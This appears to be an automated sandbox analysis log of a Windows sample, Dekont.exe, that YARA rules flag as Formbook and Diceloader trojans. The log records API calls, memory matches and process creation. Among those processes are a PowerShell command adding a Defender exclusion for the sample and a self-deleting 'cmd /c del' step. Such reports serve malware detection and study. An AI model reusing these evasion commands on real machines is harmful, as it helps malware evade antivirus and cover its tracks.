          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04D83D10 NtOpenProcessToken
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04D839B0 NtGetContextThread
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_02B4A3E0 NtReadFile
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_02B4A330 NtCreateFile
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_02B4A460 NtClose
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_02B4A510 NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_02B4A3DB NtReadFile
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_02B4A50F NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04B1A036 NtQueryInformationProcess, NtSuspendThread, NtSetContextThread, NtQueueApcThread, NtResumeThread
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04B19BAF NtCreateSection, NtMapViewOfSection, NtMapViewOfSection, NtUnmapViewOfSection, NtClose
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04B1A042 NtQueryInformationProcess
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04B19BB2 NtCreateSection, NtMapViewOfSection, NtMapViewOfSection
          Source: C:\Users\user\Desktop\Dekont.exe | Code function: String function: 00FCB970 appears 278 times
          Source: C:\Users\user\Desktop\Dekont.exe | Code function: String function: 0104EA12 appears 86 times
          Source: C:\Users\user\Desktop\Dekont.exe | Code function: String function: 01015130 appears 58 times
          Source: C:\Users\user\Desktop\Dekont.exe | Code function: String function: 01027E54 appears 102 times
          Source: C:\Users\user\Desktop\Dekont.exe | Code function: String function: 0105F290 appears 105 times
          Source: C:\Windows\SysWOW64\control.exe | Code function: String function: 04DCF290 appears 105 times
          Source: C:\Windows\SysWOW64\control.exe | Code function: String function: 04D85130 appears 58 times
          Source: C:\Windows\SysWOW64\control.exe | Code function: String function: 04D97E54 appears 102 times
          Source: C:\Windows\SysWOW64\control.exe | Code function: String function: 04D3B970 appears 280 times
          Source: C:\Windows\SysWOW64\control.exe | Code function: String function: 04DBEA12 appears 86 times
          Source: Dekont.exe, 00000000.00000002.2066130670.0000000000C4E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs Dekont.exe
          Source: Dekont.exe, 00000000.00000000.2053687925.0000000000536000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameGHQc.exe6 vs Dekont.exe
          Source: Dekont.exe, 00000000.00000002.2071931246.0000000003929000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs Dekont.exe
          Source: Dekont.exe, 00000000.00000002.2080915076.00000000096E0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs Dekont.exe
          Source: Dekont.exe, 00000005.00000002.2142835506.00000000010CD000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Dekont.exe
          Source: Dekont.exe, 00000005.00000002.2145040101.0000000002B8D000.00000040.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameCONTROL.EXEj% vs Dekont.exe
          Source: Dekont.exe, 00000005.00000002.2142264362.0000000000B85000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCONTROL.EXEj% vs Dekont.exe
          Source: Dekont.exe, 00000005.00000002.2142264362.0000000000B47000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCONTROL.EXEj% vs Dekont.exe
          Source: Dekont.exe | Binary or memory string: OriginalFilenameGHQc.exe6 vs Dekont.exe
          Source: Dekont.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 5.2.Dekont.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
          Source: 5.2.Dekont.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 5.2.Dekont.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.Dekont.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.Dekont.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
          Source: 5.2.Dekont.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 5.2.Dekont.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.Dekont.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.2142589404.0000000000EDF000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
          Source: 00000005.00000002.2141729519.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
          Source: 00000005.00000002.2141729519.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.2141729519.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.2141729519.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.4518032619.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
          Source: 00000008.00000002.4518032619.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000008.00000002.4518032619.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.4518032619.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.4518870753.0000000004A40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
          Source: 00000008.00000002.4518870753.0000000004A40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000008.00000002.4518870753.0000000004A40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.4518870753.0000000004A40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.4518634583.00000000031B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
          Source: 00000008.00000002.4518634583.00000000031B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000008.00000002.4518634583.00000000031B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.4518634583.00000000031B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.4538701995.000000000E768000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
          Source: 00000000.00000002.2071931246.0000000003929000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
          Source: 00000000.00000002.2071931246.0000000003929000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.2071931246.0000000003929000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.2071931246.0000000003929000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: Dekont.exe PID: 1816, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: Dekont.exe PID: 5624, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: control.exe PID: 1292, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Dekont.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: 0.2.Dekont.exe.3b6bdc0.3.raw.unpack, pbLZmIIBDF2cAWVYsk.cs | Security API names: _0020.SetAccessControl
          Source: 0.2.Dekont.exe.3b6bdc0.3.raw.unpack, pbLZmIIBDF2cAWVYsk.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.Dekont.exe.3b6bdc0.3.raw.unpack, pbLZmIIBDF2cAWVYsk.cs | Security API names: _0020.AddAccessRule
          Source: 0.2.Dekont.exe.96e0000.5.raw.unpack, pbLZmIIBDF2cAWVYsk.cs | Security API names: _0020.SetAccessControl
          Source: 0.2.Dekont.exe.96e0000.5.raw.unpack, pbLZmIIBDF2cAWVYsk.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.Dekont.exe.96e0000.5.raw.unpack, pbLZmIIBDF2cAWVYsk.cs | Security API names: _0020.AddAccessRule
          Source: 0.2.Dekont.exe.3b6bdc0.3.raw.unpack, qjgvDPGw0dLJ1Nb1m8.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.Dekont.exe.96e0000.5.raw.unpack, qjgvDPGw0dLJ1Nb1m8.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: classification engine | Classification label: mal100.troj.evad.winEXE@12/6@11/1
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_008738B0 HeapSetInformation,StrCmpICW,CompareStringOrdinal,CompareStringOrdinal,CoTaskMemFree,StrCmpICW,IsOS,CompareStringOrdinal,StrCmpICW,StrCmpICW,lstrlenW,AllowSetForegroundWindow,ShellExecuteExW,CoInitializeEx,CoCreateInstance,CoUninitialize, 8_2_008738B0
          Source: C:\Users\user\Desktop\Dekont.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Dekont.exe.log
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5728:120:WilError_03
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2676:120:WilError_03
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bk4yzx4z.ilz.ps1
          Source: Dekont.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: Dekont.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
          Source: C:\Users\user\Desktop\Dekont.exe | File read: C:\Users\user\Desktop\desktop.ini
          Source: C:\Users\user\Desktop\Dekont.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: Dekont.exe | ReversingLabs: Detection: 57%
          Source: unknown | Process created: C:\Users\user\Desktop\Dekont.exe "C:\Users\user\Desktop\Dekont.exe"
          Source: C:\Users\user\Desktop\Dekont.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Dekont.exe"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Dekont.exe | Process created: C:\Users\user\Desktop\Dekont.exe "C:\Users\user\Desktop\Dekont.exe"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\control.exe "C:\Windows\SysWOW64\control.exe"
          Source: C:\Windows\SysWOW64\control.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Dekont.exe"
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Dekont.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Dekont.exe"
          Source: C:\Users\user\Desktop\Dekont.exe | Process created: C:\Users\user\Desktop\Dekont.exe "C:\Users\user\Desktop\Dekont.exe"
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\control.exe "C:\Windows\SysWOW64\control.exe"
          Source: C:\Windows\SysWOW64\control.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Dekont.exe"
          Source: C:\Users\user\Desktop\Dekont.exe | Section loaded: mscoree.dll
          Source: C:\Users\user\Desktop\Dekont.exe | Section loaded: apphelp.dll
          Source: C:\Users\user\Desktop\Dekont.exe | Section loaded: kernel.appcore.dll
          Source: C:\Users\user\Desktop\Dekont.exe | Section loaded: version.dll
          Source: C:\Users\user\Desktop\Dekont.exe | Section loaded: vcruntime140_clr0400.dll
          Source: C:\Users\user\Desktop\Dekont.exe | Section loaded: ucrtbase_clr0400.dll
          Source: C:\Users\user\Desktop\Dekont.exe | Section loaded: uxtheme.dll
          Source: C:\Users\user\Desktop\Dekont.exe | Section loaded: windows.storage.dll
          Source: C:\Users\user\Desktop\Dekont.exe | Section loaded: wldp.dll
          Source: C:\Users\user\Desktop\Dekont.exe | Section loaded: profapi.dll
          Source: C:\Users\user\Desktop\Dekont.exe | Section loaded: cryptsp.dll
          Source: C:\Users\user\Desktop\Dekont.exe | Section loaded: rsaenh.dll
          Source: C:\Users\user\Desktop\Dekont.exe | Section loaded: cryptbase.dll
          Source: C:\Users\user\Desktop\Dekont.exe | Section loaded: dwrite.dll
          Source: C:\Users\user\Desktop\Dekont.exe | Section loaded: windowscodecs.dll
          Source: C:\Users\user\Desktop\Dekont.exe | Section loaded: amsi.dll
          Source: C:\Users\user\Desktop\Dekont.exe | Section loaded: userenv.dll
          Source: C:\Users\user\Desktop\Dekont.exe | Section loaded: msasn1.dll
          Source: C:\Users\user\Desktop\Dekont.exe | Section loaded: gpapi.dll
          Source: C:\Users\user\Desktop\Dekont.exe | Section loaded: propsys.dll
          Source: C:\Users\user\Desktop\Dekont.exe | Section loaded: edputil.dll
          Source: C:\Users\user\Desktop\Dekont.exe | Section loaded: urlmon.dll
          Source: C:\Users\user\Desktop\Dekont.exe | Section loaded: iertutil.dll
          Source: C:\Users\user\Desktop\Dekont.exe | Section loaded: srvcli.dll
          Source: C:\Users\user\Desktop\Dekont.exe | Section loaded: netutils.dll
          Source: C:\Users\user\Desktop\Dekont.exe | Section loaded: windows.staterepositoryps.dll
          Source: C:\Users\user\Desktop\Dekont.exe | Section loaded: sspicli.dll
          Source: C:\Users\user\Desktop\Dekont.exe | Section loaded: wintypes.dll
          Source: C:\Users\user\Desktop\Dekont.exe | Section loaded: appresolver.dll
          Source: C:\Users\user\Desktop\Dekont.exe | Section loaded: bcp47langs.dll
          Source: C:\Users\user\Desktop\Dekont.exe | Section loaded: slc.dll
          Source: C:\Users\user\Desktop\Dekont.exe | Section loaded: sppc.dll
          Source: C:\Users\user\Desktop\Dekont.exe | Section loaded: onecorecommonproxystub.dll
          Source: C:\Users\user\Desktop\Dekont.exe | Section loaded: onecoreuapcommonproxystub.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
